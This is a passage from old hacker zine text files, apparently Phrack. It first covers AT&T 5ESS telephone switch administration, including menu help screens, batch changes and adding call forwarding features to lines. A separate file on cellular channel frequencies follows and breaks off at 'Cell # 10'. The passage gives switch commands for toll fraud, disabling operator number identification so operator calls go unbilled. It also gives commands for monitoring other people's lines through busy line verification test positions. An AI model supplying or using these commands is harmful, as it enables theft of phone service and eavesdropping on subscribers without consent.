 7  TRUNKS - MISC.         18  SM & REMOTE TERMINALS    28  GLOBAL RC - LINES
 8  OFFICE MISC. & ALARMS  19  SM UNIT

Menu Commands:
------------------------------------------------------------------------------

The help menus for the 5ESS switch are lame, but I thought that it would be
good to show them to you just for the hell of it, because it does explain a
little about the switch.

------------------------------------------------------------------------------
SCREEN 1 OF 7                  5ESS SWITCH
                          RECENT CHANGE VIEW H.1
                         COMMANDS FOR MENU PAGES

H   - Explains commands for MENU or views.  If you enter H again, then it
      will display next HELP page.
H#  - Select HELP page.  (# - help page number)
Q   - Quit Recent Change and Verify.
R   - Change mode to RECENT CHANGE
V   - Change mode to VERIFY
<   - Go to CLASS MENU page.
#   - If on CLASS MENU page Go to a VIEW MENU page #.
#   - If on VIEW MENU page Go to a RECENT CHANGE or VERIFY VIEW #.
#.# - Go to a RECENT CHANGE or VERIFY VIEW.  (CLASS#.VIEW#)
---------------------------------------------------
SCREEN 2 OF 7                  5ESS SWITCH
                          RECENT CHANGE VIEW H.1
                         COMMANDS FOR MENU PAGES

#R  - Go to Recent Change view for read.
#I  - Go to Recent Change view for insert.
#D  - Go to Recent Change view for delete (only print Key fields).
#DV - Go to Recent Change view for delete with verify (print all fields).
#U  - Go to Recent Change view for update.
#UI - Go to Recent Change view for update in insert mode (user can change
      each field sequentially without typing field number).
#V  - Go to Verify view.
#N  - Go to next menu page.  Back to the 1st page if there's no next page.
------------------------------------------------
SCREEN 3 OF 7                  5ESS SWITCH
                          RECENT CHANGE VIEW H.1
                            COMMANDS FOR BATCH

BMI - Delayed Activation Mode.  Choose time or demand release (for time
      release add service information).  Select view number for Recent
      Change.
BMD - Display Status of Delayed Activation Recent Changes.
BMR - Release a file of Recent Changes stored for Delayed Activation.
IM  - Immediate Release Mode.
________________________________________________
SCREEN 4 OF 7                  5ESS SWITCH
                          RECENT CHANGE VIEW H.1
                            COMMANDS FOR VIEWS

<      - In first field: Leave this view and return to select view number.
<      - Not in first field: Return to first field.
^      - In first field: Select new operation for this view.
^      - Not in first field: Return to previous field.
> or ; - Go to end of view or stop at next required field.
*      - Execute the operation or go to next required field.
?      - Toggle help messages on and off.
Q      - Abort this view and start over.
V      - Validate input for errors or warnings.
________________________________________________
SCREEN 5 OF 7                  5ESS SWITCH
                          RECENT CHANGE VIEW H.1
                            COMMANDS FOR VIEWS

R - Review view from Data Base.
I - Insert this view into Data Base.
U - Update this view into Data Base.
D - Delete this view from Data Base (only print Key fields).
C - CHANGE: Change a field - All fields may be changed except key fields
    when in the update mode only.
C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review
    a view and then insert a new view with similar field.  You must change
    the key fields to use this facility.  You may change other fields as
    required by the new view.
P - Print hard copy of screen image (must have RC/V printer attached).
________________________________________________
SCREEN 6 OF 7                  5ESS SWITCH
                          RECENT CHANGE VIEW H.1
                            COMMANDS FOR VIEWS

The following are used only on views containing LISTS.

` - Blank entire row.
  - Sets this field to its default value.
: - Sets this row to its default value.
[ - Go backward to previous row.
] - Go forward to next row.
; - Go to end of view or stop at next required field.
# - Go to end of list and stop at next non-list field.
{ - Delete current row and move next row to current row.
} - Move current row to next row and allow insert of row.
= - Copy previous row to current row.
* - Execute the operation or stop at next required field.
________________________________________________
SCREEN 7 OF 7                  5ESS SWITCH
                          RECENT CHANGE VIEW H.1
                COMMANDS FOR AUTOMATIC FORMS PRESENTATION

If RC/V is in automatic forms presentation and "Q" or "q" is entered for the
operation, the following commands are available.

A - Abort form fields.  RC/V stays in the current form.
B - Bypass form.  Go to next form using automatic forms presentation.
C - Cancel automatic forms presentation.  The previous menu will be
    displayed.
H - Display automatic forms presentation help messages.
< - Bypass form.  Go to next form using automatic forms presentation.
______________________________________________________________________________

When accessing the databases, here is a list of database access selections:

        I (insert) - Insert new data
        R (review) - Review existing data
        U (update) - Update or change existing data
        D (delete) - Delete (remove) unwanted data from the data base
        V (verify) - Verify the data in the data base.

These are to be entered when one sees the prompt:

-----------------------------------------------------------------------------
Enter Database Operation
I=Insert R=Review U=Update D=Delete : _
------------------------------------------------------------------------------

When using the RC/V menu system of the 5ESS, you may go and just keep going
into sub-menus, and fall off the end of the Earth.  Here are the
navigational commands that are used to move around the menu system.  As seen
from the RC/V menu system help, you see "SCREEN X out of X."  This means
that there are so many screens to go, and to move between the screens you
use the `` < '' to move back (toward main menu) and `` > '' to move to the
last menu.  I know it is shown in the help menu, but it is not explained
like it needs to be.

Batch Input
~~~~~~~~~~~
The Batch Input feature for the 5ESS switch allows recent changes (RC) to be
entered at any date and time when the RC update would be performed.  This
allows RC input to be entered quickly, and for a large number of inputs.
The large numbers of RC input can be released quickly in batch mode.  The RC
input can then be entered at any time, stored until needed, and then
released for use by the system whenever needed, at any specific date and/or
time.

First and second level error correction is done during batch input.

There are several different modes of batch input.
These are:

        BMI - batch mode input - TIMEREL and DEMAND
        BMD - batch mode display
        BMR - batch mode release

BMI - Batch Mode Input - TIMEREL and DEMAND

To enter BMI (Batch Mode Input), one types `` BMI '' at the RC/V menu
prompt.  Once entered, you will be prompted with whether the input is DEMAND
(demand) or TIMEREL (Time Release).  DEMAND input allows one to manually
have the batch update the database; TIMEREL is automatic.  TIMEREL has one
enter a time and date.

When using DEMAND, you will be prompted for the file name.  The file will be
in `` /rclog '' in the DMERT OS.

In TIMEREL, you will be prompted with the CLERK-ID, which in this case is
the file name for the file in the `` /rclog ''.  Then for VERBOSE options,
the RC SRVOR (Recent Change Service Order) is displayed on the screen.

-RC SRVOR View in the BMI TIMEREL Batch Option-
------------------------------------------------------------------------------
                               5ESS SWITCH
                            RECENT CHANGE B.1
                        SERVICE ORDER NUMBER VIEW

 *1. ORDNO  __________
 *2. ITNO   ____
 *3. MSGNO  ____
 #4. RDATE  ______
 #5. RTIME  ____

Enter Insert, Change, Validate, or Print:
-----------------------------------------------------------------------------

        ORDNO = Service Order Number
        ITNO  = Item Number
        MSGNO = Message Number
        RDATE = Release Date (Update database Date)
        RTIME = Release Time (Update database Time)

BMD - batch mode display

BMD is a "mask" of RC/V done from the RC/V channel craft shell, by using the
REPT:RCHIST or a pseudo menu system.  All transactions are displayed on the
ROP, though the data could also be sent to a file in the `` /rclog '' in
DMERT.

The Pseudo menu system looks like:

----------------------------------------------------------------------------
1. Summary of clerk activity
2. Activity by service order number
3. Activity by clerk ID
4. Return to view or class menu.
----------------------------------------------------------------------------

1 allows one to view the "DELAYED RELEASE SUMMARY REPORT."
2 produces a "DELAYED RELEASE REPORT BY SERVICE ORDER."
3 produces the "DELAYED RELEASE REPORT BY CLERK ID."
4 Return to view or class menu, self-explanatory.

REPT:RCHIST - BMD

The REPT:RCHIST BMD (Text) command is done from the RC/V channel craft
shell.  The command synopsis is:

5E2 - 5E5 (Generics)

REPT:RCHIST,CLERK=[,FORMAT={SUMMARY|DETAIL}]{[,ALL]|[,PENDING][,COMPLETE]
[,ERROR][,DEMAND]}[,DEST=FILENAME][,TIME=XXXXXXXXXX];

5E6 - 5E8 (Generics)

REPT:RCHIST,CLERK=a[,FORMAT={SUMMARY|DETAIL}] {,ALL|,b}[,DEST={c|FILE}]
[,TIME=XXXXXXXXXX];

SUMMARY  - Report selection, format by key.
DETAIL   - Report selection for Recent Change entire.
ALL      - Report all recent changes.
PENDING  - Report pending recent change input.
COMPLETE - Report released recent changes that were successful when
           completed.
FILE     - Name for file in /rclog
ERROR    - Report recent changes released with error.
DEMAND   - Report demand recent changes.
TIME=XXXXXXXXXX - XX - month, XX - day, XX - hour, XX - minute, XX - second

BMR - batch mode release

This is the manual release (updating) of the 5ESS database.  This is done
from the RC/V channel craft shell.  The command that is used is the
EXC:RCRLS input message.  There is no real need to go into this message.

Adding RCF (Remote Call Forward) on a 5ESS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. At the "MENU COMMANDS" prompt of the 5ESS main menu in the RC/V APPRC
   menu system of the 5ESS, enter '12' for the "BRCS FEATURE DEFINITION".
   Then access screen '1.11', this is the BRCS screen.  When it asks you to
   'ENTER DATABASE OPERATION' enter "U" for Update and hit return.

   NOTE: When at menu '12,' you will NOT see '1.11' listed in the menu
         options.  By just accessing menu '1' you will not be able to add
         features.  This is a problem with the 5ESS menu system.

2. Type in the Telephone Number.
   It should look like this:

------------------------------------------------------------------------------
Mon Feb 31 09:09:09 2001 RFA_TN
-------------------------------------------------------------------------
                            5ESS SWITCH WCDS0
SCREEN 1 OF 2                                            RECENT CHANGE 1.11
                BRCS FEATURE ASSIGNMENT (LINE ASSIGNMENT)

 *1. TN 5551212    * 2. OE _ ________    3. LCC ___     4. PIC 288
 *5. PTY _         * 6. MLHG ____        7. MEMB ____   8. BFGN _______ _

                         FEATURE LIST (FEATLIST)
 ROW  11. FEATURE A P   15. FEATURE A P   19. FEATURE A P   23. FEATURE A P
  1.      /CFV     N _      ________ _ _      ________ _ _      ________ _ _
  2.      ________ _ _      ________ _ _      ________ _ _      ________ _ _
  3.      ________ _ _      ________ _ _      ________ _ _      ________ _ _
  4.      ________ _ _      ________ _ _      ________ _ _      ________ _ _
------------------------------------------------------------------------------

and will prompt you with:

------------------------------------------------------------------------------
Enter Insert, Change, Validate, screen#, or Print: _
form operation prompt
------------------------------------------------------------------------------

        I - to insert a form
        C - to change a field on a form
        V - to validate the form
        A - to display the desired screen number
        P - to print the current screen
        U - to update the form

   Enter `` C '' to change, access field 11 and row 1 (go to the /CFV
   wherever it may be) or add /CFR if it is not there.  If it does though,
   leave the "A" (Active) field "N" (Yes or No).  Change the P
   (Presentation) column to "U" (Update).  Then Hit Return.

   NOTE: Different Generics have other fields, one of them being an AC
         (Access Code) field.  This field is a logical field, which means it
         only accepts a "Y" for yes and "N" for no.  Also when adding the
         feature to the switch, the row and field numbers may not be shown,
         but will always follow this pattern.  Also note that the /CFV (Call
         forwarding variable) feature may not be there; there may be no
         features on the line.  These examples are from Generic 4 (2).
         Here is an example of 5E8 (which is not used in too many places),
         but this is what menu 1.11 in the BRCS Feature Definition looks
         like:

-------------------------------------------------------------------------------
                               5ESS SWITCH
SCREEN 1 OF 2                                            RECENT CHANGE 1.11
               (5112,5113)BRCS FEATURE ASSIGNMENT (LINE)

 (*)1. TN _______   (*)2. OE _ ________   3. LCC ___   4. PID ___
 (*)6. MLHG ____    8. BFGN _______ _
 (*)5. PTY _        (*) 7. MEMB ____

 11.                     FEATURE LIST (FEATLIST)
 ROW FEATURE  A P AC R   ROW FEATURE  A P AC R   ROW FEATURE  A P AC R
  1  ________ _ _ _  _    8  ________ _ _ _  _   15  ________ _ _ _  _
  2  ________ _ _ _  _    9  ________ _ _ _  _   16  ________ _ _ _  _
  3  ________ _ _ _  _   10  ________ _ _ _  _   17  ________ _ _ _  _
  4  ________ _ _ _  _   11  ________ _ _ _  _   18  ________ _ _ _  _
  5  ________ _ _ _  _   12  ________ _ _ _  _   19  ________ _ _ _  _
  6  ________ _ _ _  _   13  ________ _ _ _  _   20  ________ _ _ _  _
  7  ________ _ _ _  _   14  ________ _ _ _  _   21  ________ _ _ _  _

Enter Insert, Change, Validate, screen#, or Print: _
-------------------------------------------------------------------------------

   Hit Return twice to get back to "ENTER UPDATE, CHANGE, SCREEN #, OR
   PRINT:".  Enter a "U" for update and hit Return.  It will say "FORM
   UPDATE".

3. Next access screen 1.22, call forwarding (line parameters), or it will
   just come up automatically if you set the "P" to "U".

------------------------------------------------------------------------------
Mon Feb 31 09:09:09 2001 RCFLNTN
----------------------------------------------------------------------
                            5ESS SWITCH WCDS0
                            RECENT CHANGE 1.22
                    CALL FORWARDING (LINE PARAMETERS)

 *1. TN        5551212
 *6. FEATURE   CFR
  9. FWDTODN   ______________________________
 10. BILLAFTX  0                 16. SIMINTER 99
 11. TIMEOUT   0                 17. SIMINTRA 99
 12. BSTNINTVL 0                 18. CFMAX    32
 13. CPTNINTVL 0                 19. BSRING   N
-------------------------------------------------------------------------------

4. If you used the automatic forms presentation, it will have the telephone
   number already on LINE1.
   If not, retype the telephone number you want forwarded.  The bottom of
   the screen will say "ENTER UPDATE, CHANGE, VALIDATE OR PRINT:", type "C"
   for change and hit return.

5. When it says CHANGE FIELD type "9" and enter your forward to DN
   (Destination Number) including NPA if necessary.  This will put you back
   to the "CHANGE FIELD" prompt.  Hit return again for the "ENTER UPDATE,
   CHANGE, VALIDATE OR PRINT:".  Hit "U" for Update form and wait for "FORM
   UPDATED".

6. Lastly, access screen 1.12, BRCS FEATURE ACTIVATION (LINE ASSIGNMENT).
   At the prompt enter a "U" for Update, and on ROW 11 Line 1 (or wherever),
   change the "N" in column "A" to a "Y" for Yes, and you are done.

Adding other features
~~~~~~~~~~~~~~~~~~~~~
To add other features onto a line, follow the same format for adding the
/CFR, but you may not need to access 1.22.  Some other features are:

Feature Code:   Feature Name:

/LIDLXA  - CLID
/CFR     - Remote Call Forward
/CWC1    - Call Waiting
/CFBLIO  - call forward busy line i/o
/CFDAIO  - call forward don't answer i/o
/CFV     - call forwarding variable
/CPUO    - call pick up o            !used in the selq1 field!
/CPUT    - call pick up t            !used in the tpredq field!
/CWC1D   - Premiere call waiting
/DRIC    - Dist. ring
/IDCT10  - Inter room ID
/IDCTX2  - 1digit SC
/IDCTX2  - Interoom ID 2
/IDCTX2  - Premiere 7/30, convenience dialing
/IDCTX3  - Premiere 7/30, no cd
/IDMVP1  - Premiere 2/6, no convenience dialing
/IDMVP2  - Premiere 2/6, CD, not control sta.
/IDMVP3  - Premiere 2/6, CD, control station
/MWCH1   - Call hold
/MWCTIA2 - Call transfer 2
/TGUUT   - Terminal group ID number with TG view (1.29).

ANI/F the whole switch
~~~~~~~~~~~~~~~~~~~~~~
Automatic Number Identification failures (also called "dark calls") are
caused by a variety of different things.  To understand this better, here
are the technical names and causes; note this is not in stone and the causes
are not the only causes for an ANI-F to occur.

ANF  -- Failure to receive automatic number identification (ANI) digits on
        incoming local access and transport area (LATA) trunk.
ANF2 -- Automatic number identification (ANI) collected by an operator
        following a failure to receive ANI digits on an incoming centralized
        automatic message accounting (CAMA) trunk from the DTMF decoder.
ANI  -- Time-out waiting for far off-hook from Traffic Service Position
        System (TSPS) before sending ANI digits.

Though, I have always wondered how to set one up myself in a safe way.  One
nice way to get ANI/F through a 5ESS is to use an inhibit command.

        INH:CAMAONI;

The command will inhibit centralized automatic message accounting (CAMA)
operator number identification (ONI) processing.  This is done from the DTMF
decoder (going over later).

This message will cause a minor alarm to occur.  If in the CO when the alarm
occurs, you will hear this bell all the time, because something is always
going out.  In this case, this alarm is a level 1 (max to five) and the bell
will ring once.

Once this message is input, all calls through CAMA operator will be free of
charge.  So just dial the operator and you will have free calls.

To place this back on the switch, just type:

        ALW:CAMAONI;

and the minor alarm will stop, and things will go back to normal.

Setting up your own BLV on the 5ESS from the Craft shell RC/V Channel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well, we have come to the fun part, how to access the No-Test trunk on the
5ESS (this is also called adding the third trunk).  I will not be too
specific on how to do this.  You will need to figure out just how to do
this.

The first thing you want to do is to request a seizure of a line for
interactive trunk and line testing.  One must assign a test position (TP).

        SET:WSPHONE,TP=a,DN=b
        SET:WSPOS,TP=a,DN=b

        a = A number between 1 and 8
        b = The number you wish assigned to the test position

This will choose a number to be the test number on the switch.
Now using the CONN:WSLINE one can set up a BLV.

        CONN:WSLINE,TP=a,DN=b;

        a = TP that you set from the SET:WSPOS
        b = The number you want to BLV

To set this up on a MLHG (can come in real useful for those pesky public
packet switched networks), do a:

        CONN:WSLINE,TP=a,MLHG=x-y;

        x = MLHG number, y = MLHG member number

To set things back to normal and disconnect the BLV do a:

        DISC:WSPHONE,TP=z

        z = TP 1 through 8

NOTE: One may need to do a ALW:CALLMON before entering the CONN commands

BIG NOTE: If you set your home telephone number as the test position, and
          you have only one phone line, you are stupid.

Comments about the Underground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
There are a few people out there who have no idea what they are doing, and
go on thinking they know it all (i.e. No Name Brand).  It pisses me off when
these people just go off and make shit up about things they have no idea
what they are talking about.

This file is to all the lazy people out there that just keep bitching and
moaning about not knowing where to find information.

Other Sources
~~~~~~~~~~~~~
Here is a list of Manuals that you can order from the CIC (1-800-432-6600).
Note that some of these manuals are well over hundreds of dollars.

Manual 234-105-110   System Maintenance Requirements and Tools
Manual 235-001-001   Documentation Guide
Manual 235-070-100   Switch Administration Guidelines
Manual 235-100-125   System Description
Manual 235-105-110   System Maintenance Requirements and Tools
Manual 235-105-200   Precutover and Cutover Procedures
Manual 235-105-210   Routine Operations and Maintenance
Manual 235-105-220   Corrective Maintenance
Manual 235-105-231   Hardware Change Procedures - Growth
Manual 235-105-24x   Generic Retrofit Procedures
Manual 235-105-250   System Recovery
Manual 235-105-250A  Craft Terminal Lockout Job Aid
Manual 235-105-331   Hardware Change Procedures - Degrowth
Manual 235-105-44x   Large Terminal Growth Procedures
Manual 235-118-200   Recent Change Procedures Menu Mode Generic Program
Manual 235-118-210   Recent Change Procedures Menu Mode
Manual 235-118-213   Menu Mode 5E4 Software Release
Manual 235-118-214   Batch Release 5E4 Software Release
Manual 235-118-215   Text Interface 5E4 Software Release
Manual 235-118-216   Recent Change Procedures
Manual 235-118-217   Recent Change Procedures Batch Release 5E5 Software
                     Release
Manual 235-118-218   Recent Change Attribute Definitions 5E5 Software
                     Release
Manual 235-118-21x   Recent Change Procedures - Menu Mode
Manual 235-118-224   Recent Change Procedures 5E6 Software Release
Manual 235-118-225   Recent Change Reference 5E6 Software Release
Manual 235-118-240   Recent Change Procedures
Manual 235-118-241   Recent Change Reference
Manual 235-118-242   Recent Change Procedures 5E8 Software Release
Manual 235-118-24x   Recent Change Procedures
Manual 235-118-311   Using RMAS 5E4 Software Release
Manual 235-118-400   Office Records and Database Query 5E4 Software Release
Manual 235-190-101   Business and Residence Modular Features **
Manual 235-190-105   ISDN Features and Applications
Manual 235-190-115   Local and Toll System Features
Manual 235-190-120   Common Channel Signaling Service Features
Manual 235-190-130   Local Area Services Features
Manual 235-190-300   Billing Features
Manual 235-600-103   Translations Data
Manual 235-600-30x   ECD/SG Data Base
Manual 235-600-400   Audits
Manual 235-600-500   Assert Manual
Manual 235-600-601   Processor Recovery Messages
Manual 235-700-300   Peripheral Diagnostic Language
Manual 235-900-101   Technical Specification and System Description
Manual 235-900-103   Technical Specification
Manual 235-900-104   Product Specification
Manual 235-900-10x   Product Specification
Manual 235-900-301   ISDN Basic Rate Interface Specification
Manual 250-505-100   OSPS Description and Procedures
Manual 363-200-101   DCLU Integrated SLC Carrier System
Manual TG-5          Translation Guide

Practice 254-341-100 File System Software Subsystem Description 3B20D
                     Computer
Practice 254-301-110 Input-Output Processor Peripheral Controllers
                     Description and Theory of Operation AT$T 3B20D Model 1
                     Computer None.
Practice 254-341-220 3B20 System Diagnostic Software Subsystem Description
                     3B20D Processor

CIC Select Code 303-001 Craft Interface User's Guide
CIC Select Code 303-002 Diagnostics User's Guide
CIC Select Code 303-006 AT$T AM UNIX RTR Operating System, System Audits
                        Guide

IM-5D000-01  Input Manual
OM-5d000-01  Output Manual

OPA-5P670-01 The Administrator User Guide
OPA-5P672-01 The Operator User Guide
OPA-5P674-01 The RMAS Generic - Provided User Masks

Trademarks
~~~~~~~~~~
5ESS  - Registered trademark of AT$T.
CLCI  - Trademark of Bell Communications Research, Inc.
CLLI  - Trademark of Bell Communications Research, Inc.
ESS   - Trademark of AT$T.
SLC   - Registered trademark of AT$T.
UNIX  - Registered trademark of AT$T.
DMERT - Registered trademark of AT$T.
SCCS  - Registered trademark of AT$T
DMS   - Registered trademark of Northern Telecom
DEC   - Registered trademark of Digital Equipment Corporation.
VT100 - Trademark of Digital Equipment Corporation.

Acronyms and Abbreviations
~~~~~~~~~~~~~~~~~~~~~~~~~~
ADTS - Automatic Data Test System
ALIT - Automatic Line Insulation Testing
AMA - Automatic Message Accounting
AP - Attached Processor (1AESS 3B20)
ATICS - Automated Toll Integrity Checking System
BLV - Busy Line Verification
BMD - Batch Mode Display
BMI - Batch Mode Input - TIMEREL and DEMAND
BMR - Batch Mode Release
BRCS - Business Residence Custom Service
CAMA - Centralized Automatic Message Accounting
CIC - Customer Information Center (AT$T)
DAMT - Direct Access Mechanize Testing
DLTU - Digital Line Trunk Unit
DMERT - Duplex Multiple Environment Real Time
DSU - Digital Service Unit
DTAC - Digital Test Access Connector
GRASP - Generic Access Package
IOP - Input/Output Processor
IPS - Integrated Provisioning System
ISDN - Integrated Services Digital Network
ITNO - Item Number
LMOS - Loop Maintenance Operations System
LU - Line Unit
MCC - Master Control Center
MLT-2 - Mechanized Loop Testing - The Second Generation of Equipment
MML - Man Machine Language
MSGNO - Message Number
MSGS - Message Switch
NCT - Network Control and Timing
ODD - Office Dependent Data
OE - Office Equipment
ONI - Operator Number Identification
ORDNO - Service Order Number
OSPS - Operator Service Position System
OSS - Operations Support System
POVT - Provisioning On-site Verification Testing
RC - Recent Change
RC/V - Recent Change and Verify
RDATE - Release Date (Update Database Date)
RMAS - Remote Memory Administration
RTIME - Release Time (Update Database Time)
RTS - Remote Test Unit
SARTS - Switched Access Remote Test System
SCCS - Switching Control Center System
SLC - Subscriber Loop Carrier
SM - Switching Module
SMAS - Switched Maintenance Access System
SMPU - Switch Module Processor Unit
SONET - Synchronous Optical Network
SPC - Stored Program Control
STLWS - Supplementary Trunk and Line Work Station
TFTP - Television Facility Test Position
TIMEREL - Time Release
TIRKS - Trunk Integrated Record Keeping System
TMS - Time Multiplexed Switch
TRCO - Trouble Reporting Control Office
TSI - Time Slot Interchangers
TSIU - Time Slot Interchange Unit
TU - Trunk Unit
VFY - Verify

I give AT$T due credit for much of this file, for without them, it would
not have been possible!

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 17 of 27

CELLULAR INFORMATION
COMPILED BY MADJUS of N.O.D.
{Thanks go out to Spy Ace & The Nobody}

CELLULAR FREQUENCIES BY CELL

BAND A

Cell # 1            Transmit      Receive
--------------------------------------------------
Channel 1 (333)     Tx 879.990    Rx 834.990
Channel 2 (312)     Tx 879.360    Rx 834.360
Channel 3 (291)     Tx 878.730    Rx 833.730
Channel 4 (270)     Tx 878.100    Rx 833.100
Channel 5 (249)     Tx 877.470    Rx 832.470
Channel 6 (228)     Tx 876.840    Rx 831.840
Channel 7 (207)     Tx 876.210    Rx 831.210
Channel 8 (186)     Tx 875.580    Rx 830.580
Channel 9 (165)     Tx 874.950    Rx 829.950
Channel 10 (144)    Tx 874.320    Rx 829.320
Channel 11 (123)    Tx 873.690    Rx 828.690
Channel 12 (102)    Tx 873.060    Rx 828.060
Channel 13 (81)     Tx 872.430    Rx 827.430
Channel 14 (60)     Tx 871.800    Rx 826.800
Channel 15 (39)     Tx 871.170    Rx 826.170
Channel 16 (18)     Tx 870.540    Rx 825.540

Cell # 2
--------------------------------------------------
Channel 1 (332)     Tx 879.960    Rx 834.960
Channel 2 (311)     Tx 879.330    Rx 834.330
Channel 3 (290)     Tx 878.700    Rx 833.700
Channel 4 (269)     Tx 878.070    Rx 833.070
Channel 5 (248)     Tx 877.440    Rx 832.440
Channel 6 (227)     Tx 876.810    Rx 831.810
Channel 7 (206)     Tx 876.180    Rx 831.180
Channel 8 (185)     Tx 875.550    Rx 830.550
Channel 9 (164)     Tx 874.920    Rx 829.920
Channel 10 (143)    Tx 874.290    Rx 829.290
Channel 11 (122)    Tx 873.660    Rx 828.660
Channel 12 (101)    Tx 873.030    Rx 828.030
Channel 13 (80)     Tx 872.400    Rx 827.400
Channel 14 (59)     Tx 871.770    Rx 826.770
Channel 15 (38)     Tx 871.140    Rx 826.140
Channel 16 (17)     Tx 870.510    Rx 825.510

Cell # 3
--------------------------------------------------
Channel 1 (331)     Tx 879.930    Rx 834.930
Channel 2 (310)     Tx 879.300    Rx 834.300
Channel 3 (289)     Tx 878.670    Rx 833.670
Channel 4 (268)     Tx 878.040    Rx 833.040
Channel 5 (247)     Tx 877.410    Rx 832.410
Channel 6 (226)     Tx 876.780    Rx 831.780
Channel 7 (205)     Tx 876.150    Rx 831.150
Channel 8 (184)     Tx 875.520    Rx 830.520
Channel 9 (163)     Tx 874.890    Rx 829.890
Channel 10 (142)    Tx 874.260    Rx 829.260
Channel 11 (121)    Tx 873.630    Rx 828.630
Channel 12 (100)    Tx 873.000    Rx 828.000
Channel 13 (79)     Tx 872.370    Rx 827.370
Channel 14 (58)     Tx 871.740    Rx 826.740
Channel 15 (37)     Tx 871.110    Rx 826.110
Channel 16 (16)     Tx 870.480    Rx 825.480

Cell # 4
--------------------------------------------------
Channel 1 (330)     Tx 879.900    Rx 834.900
Channel 2 (309)     Tx 879.270    Rx 834.270
Channel 3 (288)     Tx 878.640    Rx 833.640
Channel 4 (267)     Tx 878.010    Rx 833.010
Channel 5 (246)     Tx 877.380    Rx 832.380
Channel 6 (225)     Tx 876.750    Rx 831.750
Channel 7 (204)     Tx 876.120    Rx 831.120
Channel 8 (183)     Tx 875.490    Rx 830.490
Channel 9 (162)     Tx 874.860    Rx 829.860
Channel 10 (141)    Tx 874.230    Rx 829.230
Channel 11 (120)    Tx 873.600    Rx 828.600
Channel 12 (99)     Tx 872.970    Rx 827.970
Channel 13 (78)     Tx 872.340    Rx 827.340
Channel 14 (57)     Tx 871.710    Rx 826.710
Channel 15 (36)     Tx 871.080    Rx 826.080
Channel 16 (15)     Tx 870.450    Rx 825.450

Cell # 5
--------------------------------------------------
Channel 1 (329)     Tx 879.870    Rx 834.870
Channel 2 (308)     Tx 879.240    Rx 834.240
Channel 3 (287)     Tx 878.610    Rx 833.610
Channel 4 (266)     Tx 877.980    Rx 832.980
Channel 5 (245)     Tx 877.350    Rx 832.350
Channel 6 (224)     Tx 876.720    Rx 831.720
Channel 7 (203)     Tx 876.090    Rx 831.090
Channel 8 (182)     Tx 875.460    Rx 830.460
Channel 9 (161)     Tx 874.830    Rx 829.830
Channel 10 (140)    Tx 874.200    Rx 829.200
Channel 11 (119)    Tx 873.570    Rx 828.570
Channel 12 (98)     Tx 872.940    Rx 827.940
Channel 13 (77)     Tx 872.310    Rx 827.310
Channel 14 (56)     Tx 871.680    Rx 826.680
Channel 15 (35)     Tx 871.050    Rx 826.050
Channel 16 (14)     Tx 870.420    Rx 825.420

Cell # 6
--------------------------------------------------
Channel 1 (328)     Tx 879.840    Rx 834.840
Channel 2 (307)     Tx 879.210    Rx 834.210
Channel 3 (286)     Tx 878.580    Rx 833.580
Channel 4 (265)     Tx 877.950    Rx 832.950
Channel 5 (244)     Tx 877.320    Rx 832.320
Channel 6 (223)     Tx 876.690    Rx 831.690
Channel 7 (202)     Tx 876.060    Rx 831.060
Channel 8 (181)     Tx 875.430    Rx 830.430
Channel 9 (160)     Tx 874.800    Rx 829.800
Channel 10 (139)    Tx 874.170    Rx 829.170
Channel 11 (118)    Tx 873.540    Rx 828.540
Channel 12 (97)     Tx 872.910    Rx 827.910
Channel 13 (76)     Tx 872.280    Rx 827.280
Channel 14 (55)     Tx 871.650    Rx 826.650
Channel 15 (34)     Tx 871.020    Rx 826.020
Channel 16 (13)     Tx 870.390    Rx 825.390

Cell # 7
--------------------------------------------------
Channel 1 (327)     Tx 879.810    Rx 834.810
Channel 2 (306)     Tx 879.180    Rx 834.180
Channel 3 (285)     Tx 878.550    Rx 833.550
Channel 4 (264)     Tx 877.920    Rx 832.920
Channel 5 (243)     Tx 877.290    Rx 832.290
Channel 6 (222)     Tx 876.660    Rx 831.660
Channel 7 (201)     Tx 876.030    Rx 831.030
Channel 8 (180)     Tx 875.400    Rx 830.400
Channel 9 (159)     Tx 874.770    Rx 829.770
Channel 10 (138)    Tx 874.140    Rx 829.140
Channel 11 (117)    Tx 873.510    Rx 828.510
Channel 12 (96)     Tx 872.880    Rx 827.880
Channel 13 (75)     Tx 872.250    Rx 827.250
Channel 14 (54)     Tx 871.620    Rx 826.620
Channel 15 (33)     Tx 870.990    Rx 825.990
Channel 16 (12)     Tx 870.360    Rx 825.360

Cell # 8
--------------------------------------------------
Channel 1 (326)     Tx 879.780    Rx 834.780
Channel 2 (305)     Tx 879.150    Rx 834.150
Channel 3 (284)     Tx 878.520    Rx 833.520
Channel 4 (263)     Tx 877.890    Rx 832.890
Channel 5 (242)     Tx 877.260    Rx 832.260
Channel 6 (221)     Tx 876.630    Rx 831.630
Channel 7 (200)     Tx 876.000    Rx 831.000
Channel 8 (179)     Tx 875.370    Rx 830.370
Channel 9 (158)     Tx 874.740    Rx 829.740
Channel 10 (137)    Tx 874.110    Rx 829.110
Channel 11 (116)    Tx 873.480    Rx 828.480
Channel 12 (95)     Tx 872.850    Rx 827.850
Channel 13 (74)     Tx 872.220    Rx 827.220
Channel 14 (53)     Tx 871.590    Rx 826.590
Channel 15 (32)     Tx 870.960    Rx 825.960
Channel 16 (11)     Tx 870.330    Rx 825.330

Cell # 9
--------------------------------------------------
Channel 1 (325)     Tx 879.750    Rx 834.750
Channel 2 (304)     Tx 879.120    Rx 834.120
Channel 3 (283)     Tx 878.490    Rx 833.490
Channel 4 (262)     Tx 877.860    Rx 832.860
Channel 5 (241)     Tx 877.230    Rx 832.230
Channel 6 (220)     Tx 876.600    Rx 831.600
Channel 7 (199)     Tx 875.970    Rx 830.970
Channel 8 (178)     Tx 875.340    Rx 830.340
Channel 9 (157)     Tx 874.710    Rx 829.710
Channel 10 (136)    Tx 874.080    Rx 829.080
Channel 11 (115)    Tx 873.450    Rx 828.450
Channel 12 (94)     Tx 872.820    Rx 827.820
Channel 13 (73)     Tx 872.190    Rx 827.190
Channel 14 (52)     Tx 871.560    Rx 826.560
Channel 15 (31)     Tx 870.930    Rx 825.930
Channel 16 (10)     Tx 870.300    Rx 825.300

Cell # 10
--------------------------------------------------
